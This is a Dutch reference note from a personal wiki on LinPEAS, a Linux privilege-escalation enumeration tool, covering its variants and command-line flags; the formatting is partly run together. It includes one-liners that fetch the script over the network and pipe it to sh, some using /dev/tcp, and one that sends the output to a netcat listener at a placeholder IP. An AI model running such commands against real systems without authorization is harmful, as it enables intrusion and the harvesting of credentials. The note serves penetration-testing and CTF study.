LinPEAS (Linux Privilege Escalation Awesome Script) is onderdeel van de PEASS-ng suite en wordt gebruikt om mogelijke privilege escalation-paden te enumereren op Linux/Unix/macOS-systemen.
Deze notitie is bedoeld als kennisdocumentatie (digital garden) voor gebruik met wiki.js.
/bin/sh)linpeas_fat.sh
linpeas.sh (standaard)
linpeas_small.sh
linpeas.sh uit op macOSDe nieuwste versies ondersteunen het selectief bouwen van checks:
Je kunt per categorie aangeven welke checks worden meegenomen (zie -o parameter).
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | shsudo python3 -m http.server 80curl http://<IP>/linpeas.sh | shnc -lvnp 80 < linpeas.shcat < /dev/tcp/<IP>/80 | shnc -lvnp 9002 | tee linpeas.outcurl http://<IP>/linpeas.sh | sh | nc <IP> 9002Output naar bestand:
./linpeas.sh -a > /dev/shm/linpeas.txt
Met kleur lezen:
less -r /dev/shm/linpeas.txt
Binary versie:
linpeas_linux_amd64-o om checks te beperken-f <pad>-a → Alle checks (behalve regex) (CTF aanbevolen)-r → Regex search (API keys, secrets)-e → Extra enumeratie-s → Superfast & stealth (geen writes)-P <password> → Gebruik password voor sudo -l en su bruteforce-D → Debug-modus-o → Kies categorieën:
-t → Automatische netwerkscan (schrijft naar disk)-d <IP/NETMASK> → Host discovery-p <ports> → Poortselectie-i <IP> → Scan specifieke hostLet op: bij netwerkopties worden geen PE-checks uitgevoerd.
Port forwarding
-F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT
Forceer modus
-L → Force linpeas-M → Force macpeasWeergave
-q → Geen banner-N → Geen kleuren-w → Pauze tussen checks/tmp/linPEDit document is bedoeld als levend naslagwerk binnen een digitale tuin (digital garden) en kan naar behoefte worden uitgebreid of verfijnd.